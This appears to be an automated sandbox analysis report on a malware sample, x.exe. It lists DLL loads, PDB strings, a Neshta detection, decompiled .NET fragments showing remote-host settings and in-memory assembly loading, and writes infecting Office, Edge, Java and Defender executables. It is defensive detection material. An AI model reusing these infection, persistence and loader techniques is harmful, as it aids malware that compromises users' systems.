                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\Desktop\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdb source: cookie_exporter.exe.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: armsvc.exe.0.dr
                              Source: Binary string: mpextms.pdb source: mpextms.exe0.0.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdbOGP source: identity_helper.exe.0.dr
                              Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
                              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.3.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdbr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\Common.DBConnection64.pdb source: Common.DBConnection64.exe.0.dr
                              Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdb source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
                              Source: Binary string: MicrosoftEdgeUpdate_unsigned.pdb source: MicrosoftEdgeUpdate.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.3.dr
                              Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb source: Microsoft.Mashup.Container.Loader.exe.3.dr
                              Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleCrashHandler64.exe.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdb source: msedge_pwa_launcher.exe.0.dr
                              Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe.pdb source: Aut2exe.exe.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.0.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb source: integrator.exe.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb00 source: unpack200.exe.0.dr
                              Source: Binary string: r.pdb source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\postc2rcross\x-none\appsharinghookcontroller.pdb source: AppSharingHookController64.exe.3.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\click2run\x-none\Integrator.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: integrator.exe.0.dr
                              Source: Binary string: VSTOInstaller.pdb source: VSTOInstaller.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdblper.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: SDXHelper.exe.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\cookie_exporter.exe.pdbOGP source: cookie_exporter.exe.0.dr
                              Source: Binary string: D:\a\_work\1\s\src\ai\windows\dll\x64\Release\aimgr.pdb source: aimgr.exe.3.dr
                              Source: Binary string: AppVDllSurrogate32.pdb source: AppVDllSurrogate.exe.3.dr
                              Source: Binary string: MicrosoftEdgeComRegisterShellARM64_unsigned.pdbh source: MicrosoftEdgeComRegisterShellARM64.exe.3.dr
                              Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_pwa_launcher.exe.pdbOGP source: msedge_pwa_launcher.exe.0.dr
                              Source: Binary string: AppVDllSurrogate32.pdbGCTL source: AppVDllSurrogate.exe.3.dr
                              Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.0.dr
                              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.0.dr
                              Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleCrashHandler64.exe.0.dr
                              Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb source: WINWORD.EXE.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\winword.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: WINWORD.EXE.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 source: ssvagent.exe.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.0.dr
                              Source: Binary string: lper.pdb source: SDXHelper.exe.3.dr
                              Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.0.dr
                              Source: Binary string: D:\dbs\el\ja2\Target\x86\ship\dcf\x-none\DatabaseCompare.pdb source: DATABASECOMPARE.EXE.0.dr
                              Source: Binary string: D:\a\_work\e\src\out\Release_x64\identity_helper.exe.pdb source: identity_helper.exe.0.dr
                              Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\mini_installer.exe.pdb source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr
                              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\sdxhelper.pdb source: SDXHelper.exe.3.dr
                              Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.0.dr
                              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: DW20.EXE.0.dr
                              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: unpack200.exe.0.dr
                              Source: Binary string: mpextms.pdbGCTL source: mpextms.exe0.0.dr
                              Source: Binary string: D:\a\_work\1\s\bin\x86\Release\Product\Binaries\Client\bin\Microsoft.Mashup.Container.Loader.pdb.. source: Microsoft.Mashup.Container.Loader.exe.3.dr

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: x.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: x.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: x.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                              .NET source code contains potential unpacker
                              Source: x.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                              Source: x.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                              Source: x.exe.0.dr, Messages.cs.Net Code: Memory
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                              Source: Java Update Checker (64 bit).exe.2.dr, Messages.cs.Net Code: Memory
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_045D629D push eax; ret 4_2_045D6351
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_045D2C85 push 04B8074Bh; retf 4_2_045D2CEE
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045A11C5 push esp; retn 0000h19_2_045A11D9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045A11F5 push esp; retn 0000h19_2_045A11D9
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045A629D push eax; ret 19_2_045A6351
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045A0B55 push esi; retn 0000h19_2_045A0B8A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045A0BC1 push edi; retn 0000h19_2_045A0BC2
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_0537636D push eax; ret 25_2_05376381
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_053762CD push eax; ret 25_2_05376381
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07CA569D push esi; retf 0007h25_2_07CA569E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07CA4E90 push eax; retf 0007h25_2_07CA500E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07CA0CE8 push cs; retf 0007h25_2_07CA0E0E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07CA1BE0 push ds; retf 0007h25_2_07CA1EE6
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07CA528D push edx; retf 0007h25_2_07CA528E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_07CA5000 push eax; retf 0007h25_2_07CA500E
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F98CDF pushad ; retf 0008h25_2_08F98DDA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F97CAF push eax; retf 0008h25_2_08F97CBA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F98C44 push esi; retf 0008h25_2_08F98C5A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F98C3F pushad ; retf 0008h25_2_08F98DDA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F98C2F push ebp; retf 0008h25_2_08F98C3A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F98DDF pushad ; retf 0008h25_2_08F98DEA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F97E1C push eax; iretd 25_2_08F97E22
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F96608 push cs; retf 0008h25_2_08F96612
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F98BDF push ecx; retf 0008h25_2_08F98BEA
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F98BC5 push edx; retf 0008h25_2_08F98C1A
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F97B0F push esp; retf 0008h25_2_08F97B19

                              Persistence and Installation Behavior

                              barindex
                              Yara detected Neshta
                              Source: Yara matchFile source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 1292, type: MEMORYSTR
                              Drops PE files with a suspicious file extension
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Windows\svchost.comJump to dropped file
                              Drops executable to a common third party application directory
                              Source: C:\Users\user\Desktop\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeExecutable created and started: C:\Windows\svchost.comJump to behavior
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to behavior
